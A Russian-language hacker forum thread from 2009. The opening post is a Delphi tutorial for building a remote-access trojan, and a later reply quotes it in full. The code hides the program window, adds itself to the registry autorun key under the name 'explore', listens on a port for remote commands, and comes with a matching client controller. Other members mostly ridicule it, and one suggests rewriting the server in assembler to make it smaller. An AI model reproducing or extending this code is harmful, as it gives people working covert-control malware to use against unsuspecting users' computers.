Троян на делфи.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Троян на делфи. - 2009-08-18 20:06:52.203333
|
|
|
H4R4K1R1
Сообщений: 21
Оценки: 0
Присоединился: 2009-08-18 19:18:08.900000
|
Trojan by HT-team :)
[Сервер]
1)Кидаем на форму серверный компонент , пусть это будет ServerSocket1.
Установим свойство port равным 45288, это порт, по которому наш троян будет принимать приказы и отсылать секреты жертвы.
2)В разделе программы var описываем переменные:
i:string;
3)Теперь запрячем форму, т.к. нам совсем необязательно, чтобы жертва видела, что у нее живет троянская лошадь:
Выбираем процедуру формы (Form1) OnCreate:
Application.ShowMainForm:=false;
{Приложение.ПоказыватьГлавнуюФорму:=ложь}
ServerSocket1.Open; {Запускаем сервер}
4)Теперь заставим трояна прописываться в автозагрузку: (в uses добавить registry, в var - registry:TRegistry
registry:=tregistry.Create; {инициализирум реестр}
registry.RootKey:=hkey_local_machine; {выбираем ключ. Подойдет также HKEY_CURRENT_USER, но только для данного юзверя}
registry.OpenKey('software\microsoft\windows\curre ntversion\run',true); {подключ}
registry.Writestring('explore',Application.ExeName ); {создаем запись}
Registry.CloseKey; {закрываем ключ}
Registry.Free; {освобождаем реестр}
5)Теперь наш троян не только не виден в списке приложений, но и сам запускается с запуском винды. Следующий шаг - принимаем команды от сервера:
В событии сервера OnClientRead {поступила команда от клиента} пишем:
i:=ServerSocket1.Socket.ReceiveText {пишем принятый текст в переменную, для сохранности}
{
А вот здесь я открываю место для твоей фантазии. Теперь можно делать так:
если поступила команда 'поменять кнопки мыши', меняем кнопки мыши, и т.д.
Вот как это выглядит на Делфи:
}
if i='поменять кнопки мыши' then
SwapMouseButton(true) //Обратно - swapmousebutton(false)
{Остальное здесь допишешь сам, я лишь направляю твои мысли в нужное русло}
6)Ты научился принимать и обрабатывать команды клиента, но иногда нужно наоборот - передать что-то клиенту, например имя пользователя. Это делается так:
Сейчас мы будем передавать версию сервера.
В той же процедуре добавляем:
if i='версия' then
ServerSocket1.Socket.Connections[0].SendText('тестовая версия');
Как видно, с помощью команды sendtext мы отправили первому клиенту сообщение "тестовая версия".
[Клиент]
1)В var также обьявляем переменную i стрингового типа для сбрасывания получаемой информации.
2)Бросаем на форму edit'ы, которые мы будем использовать: IP сервера, текст команды. Называем соответственно IP и Message;
Бросаем 4 компонента Button, называем их Connect, Disconect, Send, Exit.
Также находим ClientSocket и называем его Client.
И для полного контроля StatusBar, называем sb, сюда будут приходить ответы сервера.
3)Дальше обработчики событий для клиента:
{OnConnect}
sb.SimpleText:='Подключение произошло успешно';
{OnError}
sb.SimpleText:='Произошла ошибка';
{OnDisconnect}
sb.SimpleText:='Клиент отключен';
{OnConnecting}
sb.SimpleText:='Подключаюсь…';
{OnRead}
i:=Client.Socket.ReceiveText;
sb.SimpleText:=i;
4)Теперь обработаем событие OnClick для кнопок:
{Exit}
form1.close;
{Connect}
client.Address:=IP.text; //Передаем клиенту адрес, вписанный в Edit
client.Open; //Активация клиента
{Disconnect}
client.close;
{Send}
Client.SendText(Message.text);
sb.SimpleText:='Данные отправлены';
aka H4R4K1R1.
Special for HT-team :)
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:13:30.360000
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
Б-г-г-г))))))))
особенно:
quote:
Trojan by HT-team
Бу. Га. Га.
Мего Тима)))
Школьнеги в отаке.
Меня переполняют эмоции.
Вот откуда берутся быдлокодеры!
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:16:03.450000
|
|
|
H4R4K1R1
Сообщений: 21
Оценки: 0
Присоединился: 2009-08-18 19:18:08.900000
|
Имеешь что-то против? :(
Эта тима моя! и ее участники не жалуются!
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:17:55.206666
|
|
|
SmanxX1
Сообщений: 208
Оценки: 0
Присоединился: 2007-07-31 14:33:56.650000
|
Крута, а хеллоу ворлды пишите?
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:20:39.563333
|
|
|
H4R4K1R1
Сообщений: 21
Оценки: 0
Присоединился: 2009-08-18 19:18:08.900000
|
мой друг занимается :) ну…пишет! :)
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:22:18.710000
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
По иконке твоего поста видно, что ты от нее не в восторге))
Знач по пунктам:
1) Если пишут "что-то by какая-то тим", то это значит, что код написан участниками, а не сперт с сайтов, список которых ты запостил в соседней теме.
2) Код - боян, особенно автозагрузка.
Можно вопрос - ваша так называемая "тима" пишет "вирусы" (то, что в первом посте, назвать вирусом сложно, трояном тоже, видимо участники "тимы" этого не знают) ???
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:27:13.306666
|
|
|
H4R4K1R1
Сообщений: 21
Оценки: 0
Присоединился: 2009-08-18 19:18:08.900000
|
это моя первая работа :/ я ее еще в седьмом классе написал, а переберая архивы наткнулся на нее и решил выложить!
при помощи инета я написал его! так что прошу тебе(вас) : НЕ СУДИТЕ СТРОГО! :)
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:28:31.020000
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
quote:
ORIGINAL: H4R4K1R1
это моя первая работа :/ я ее еще в седьмом классе написал, а переберая архивы наткнулся на нее и решил выложить!
при помощи инета я написал его! так что прошу тебе(вас) : НЕ СУДИТЕ СТРОГО! :)
пацталом :D:D:D:D:D:D:D:D:D:D:D:D:D:D
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:29:44.560000
|
|
|
H4R4K1R1
Сообщений: 21
Оценки: 0
Присоединился: 2009-08-18 19:18:08.900000
|
да ну тебя!!! 8D
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:31:55.286666
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
Хочу себе продлить жизнь - у вас есть сайт?
// сетевые гангстерито))
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:32:32.536666
|
|
|
BlagJack
Сообщений: 59
Оценки: 0
Присоединился: 2008-08-29 21:39:37.970000
|
quote:
ORIGINAL: H4R4K1R1
это моя первая работа :/ я ее еще в седьмом классе написал, а переберая архивы наткнулся на нее и решил выложить!
при помощи инета я написал его! так что прошу тебе(вас) : НЕ СУДИТЕ СТРОГО! :)
А щас сумеешь написать драйвер уровня ядра на Delphi , до ? =\
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:34:31.086666
|
|
|
H4R4K1R1
Сообщений: 21
Оценки: 0
Присоединился: 2009-08-18 19:18:08.900000
|
думаю смогу :)
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:34:59.433333
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
quote:
ORIGINAL: BlagJack
quote:
ORIGINAL: H4R4K1R1
это моя первая работа :/ я ее еще в седьмом классе написал, а переберая архивы наткнулся на нее и решил выложить!
при помощи инета я написал его! так что прошу тебе(вас) : НЕ СУДИТЕ СТРОГО! :)
А щас сумеешь написать драйвер уровня ядра на Delphi , до ? =\
)) это у "тимы" уже в планах, вчера качнули дельфи - завтра смотри, уже дрова клепать начнут))))))
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:35:34.676666
|
|
|
H4R4K1R1
Сообщений: 21
Оценки: 0
Присоединился: 2009-08-18 19:18:08.900000
|
сайт есть :)
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:36:01.836666
|
|
|
BlagJack
Сообщений: 59
Оценки: 0
Присоединился: 2008-08-29 21:39:37.970000
|
quote:
ORIGINAL: H4R4K1R1
думаю смогу :)
Давай пиши и сюда выкладывай сорцы ;)
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:36:50.163333
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
выкладывай)) оценим "троянов"
// взял попкорн…..
// хотя нет, подавлюсь, нафиг….
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:37:11.933333
|
|
|
BlagJack
Сообщений: 59
Оценки: 0
Присоединился: 2008-08-29 21:39:37.970000
|
quote:
ORIGINAL: H4R4K1R1
сайт есть :)
наверно на Укозе , до ? =\
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:38:14.266666
|
|
|
H4R4K1R1
Сообщений: 21
Оценки: 0
Присоединился: 2009-08-18 19:18:08.900000
|
да, на нем родимом! сайт закрыт поятому линк нет смысла давать :)
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:39:29.960000
|
|
|
BlagJack
Сообщений: 59
Оценки: 0
Присоединился: 2008-08-29 21:39:37.970000
|
quote:
ORIGINAL: H4R4K1R1
да, на нем родимом! сайт закрыт поятому линк нет смысла давать :)
Создай еще один сейчас и копипастини туда все свои сорцы и статьи.
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:40:02.643333
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
quote:
ORIGINAL: H4R4K1R1
да, на нем родимом! сайт закрыт поятому линк нет смысла давать :)
может ты имел в виду "убогом/кривом/глючном" ?
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:40:58.333333
|
|
|
H4R4K1R1
Сообщений: 21
Оценки: 0
Присоединился: 2009-08-18 19:18:08.900000
|
да делать мне больше нехер!!!
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:43:32.760000
|
|
|
H4R4K1R1
Сообщений: 21
Оценки: 0
Присоединился: 2009-08-18 19:18:08.900000
|
quote:
может ты имел в виду "убогом/кривом/глючном" ?
а у тебя где? на народе?? :D
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:43:51.050000
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
quote:
ORIGINAL: BlagJack
quote:
ORIGINAL: H4R4K1R1
да, на нем родимом! сайт закрыт поятому линк нет смысла давать :)
Создай еще один сейчас и копипастини туда все свои сорцы и статьи.
))))
Фул Лист:
1) "Троян на дельфи"
2) "Запускаем дельфи"
3) ХеллоВорлд в дельфи
|
|
|
|
|
RE: Троян на делфи. - 2009-08-18 20:47:07.836666
|
|
|
psina007
Сообщений: 98
Оценки: 0
Присоединился: 2009-05-09 22:41:33.580000
|
quote:
Trojan by HT-team :)
Хорошо что в школах Assembler не учат…
|
|
|
|
|
RE: Троян на делфи. - 2009-08-19 01:02:36.410000
|
|
|
hrantabe
Сообщений: 203
Оценки: 0
Присоединился: 2009-08-11 11:05:12.030000
|
А было бы хорошо :D
|
|
|
|
|
RE: Троян на делфи. - 2009-08-19 03:21:07.066666
|
|
|
_SaZ_
Сообщений: 4329
Оценки: 398
Присоединился: 2008-01-30 02:18:05.553333
|
Жесть. Пацталом два раза. Помогли бы лучше мне свой поток ввода-вывода на плюсах для последовательных портов написать (аля std::iostream) :), вот и оценили бы ваши "навыки". Давно не приходилось ТАК вылизывать код. Но это полезно.
+1 за минуту здорового смеха.
|
|
|
|
|
RE: Троян на делфи. - 2009-08-19 13:12:40.296666
|
|
|
Zmaster
Сообщений: 930
Оценки: 0
Присоединился: 2007-02-09 19:02:43.500000
|
H4R4K1R1, формошлепить каждый может. Ты лучше напиши такой же трой, только сам с нуля, не используя готовый элементы.
|
|
|
|
|
RE: Троян на делфи. - 2009-08-19 15:01:36.030000
|
|
|
DzumoHu4
Сообщений: 279
Оценки: 0
Присоединился: 2008-08-04 19:04:43.236666
|
quote:
ORIGINAL: H4R4K1R1
Trojan by HT-team :)
[Сервер]
1)Кидаем на форму серверный компонент , пусть это будет ServerSocket1.
Установим свойство port равным 45288, это порт, по которому наш троян будет принимать приказы и отсылать секреты жертвы.
2)В разделе программы var описываем переменные:
i:string;
3)Теперь запрячем форму, т.к. нам совсем необязательно, чтобы жертва видела, что у нее живет троянская лошадь:
Выбираем процедуру формы (Form1) OnCreate:
Application.ShowMainForm:=false;
{Приложение.ПоказыватьГлавнуюФорму:=ложь}
ServerSocket1.Open; {Запускаем сервер}
4)Теперь заставим трояна прописываться в автозагрузку: (в uses добавить registry, в var - registry:TRegistry
registry:=tregistry.Create; {инициализирум реестр}
registry.RootKey:=hkey_local_machine; {выбираем ключ. Подойдет также HKEY_CURRENT_USER, но только для данного юзверя}
registry.OpenKey('software\microsoft\windows\curre ntversion\run',true); {подключ}
registry.Writestring('explore',Application.ExeName ); {создаем запись}
Registry.CloseKey; {закрываем ключ}
Registry.Free; {освобождаем реестр}
5)Теперь наш троян не только не виден в списке приложений, но и сам запускается с запуском винды. Следующий шаг - принимаем команды от сервера:
В событии сервера OnClientRead {поступила команда от клиента} пишем:
i:=ServerSocket1.Socket.ReceiveText {пишем принятый текст в переменную, для сохранности}
{
А вот здесь я открываю место для твоей фантазии. Теперь можно делать так:
если поступила команда 'поменять кнопки мыши', меняем кнопки мыши, и т.д.
Вот как это выглядит на Делфи:
}
if i='поменять кнопки мыши' then
SwapMouseButton(true) //Обратно - swapmousebutton(false)
{Остальное здесь допишешь сам, я лишь направляю твои мысли в нужное русло}
6)Ты научился принимать и обрабатывать команды клиента, но иногда нужно наоборот - передать что-то клиенту, например имя пользователя. Это делается так:
Сейчас мы будем передавать версию сервера.
В той же процедуре добавляем:
if i='версия' then
ServerSocket1.Socket.Connections[0].SendText('тестовая версия');
Как видно, с помощью команды sendtext мы отправили первому клиенту сообщение "тестовая версия".
[Клиент]
1)В var также обьявляем переменную i стрингового типа для сбрасывания получаемой информации.
2)Бросаем на форму edit'ы, которые мы будем использовать: IP сервера, текст команды. Называем соответственно IP и Message;
Бросаем 4 компонента Button, называем их Connect, Disconect, Send, Exit.
Также находим ClientSocket и называем его Client.
И для полного контроля StatusBar, называем sb, сюда будут приходить ответы сервера.
3)Дальше обработчики событий для клиента:
{OnConnect}
sb.SimpleText:='Подключение произошло успешно';
{OnError}
sb.SimpleText:='Произошла ошибка';
{OnDisconnect}
sb.SimpleText:='Клиент отключен';
{OnConnecting}
sb.SimpleText:='Подключаюсь…';
{OnRead}
i:=Client.Socket.ReceiveText;
sb.SimpleText:=i;
4)Теперь обработаем событие OnClick для кнопок:
{Exit}
form1.close;
{Connect}
client.Address:=IP.text; //Передаем клиенту адрес, вписанный в Edit
client.Open; //Активация клиента
{Disconnect}
client.close;
{Send}
Client.SendText(Message.text);
sb.SimpleText:='Данные отправлены';
aka H4R4K1R1.
Special for HT-team :)
Большая часть кода:
Что касается использования компонентов в Rat, то только в клиенте(где размер не имеет значения)
В сервере большая часть функций должна быть написана на ASM.(благо дельфи такое позволяет)
Скорость работы повысится + меньший размер.
З.ы
Либа с одной функцией на дельфи весит 474 килобайта
На асме аналогичная функция весит около 4 килобайт.
|
|
|
|
|
RE: Троян на делфи. - 2009-08-19 18:18:02.026666
|
|
|
Denaturat
Сообщений: 1741
Оценки: 453
Присоединился: 2008-10-27 20:50:06.380000
|
quote:
ORIGINAL: _SaZ_
Помогли бы лучше мне свой поток ввода-вывода на плюсах для последовательных портов написать (аля std::iostream)
и чем же тебе помочь?
|
|
|
|
|
|
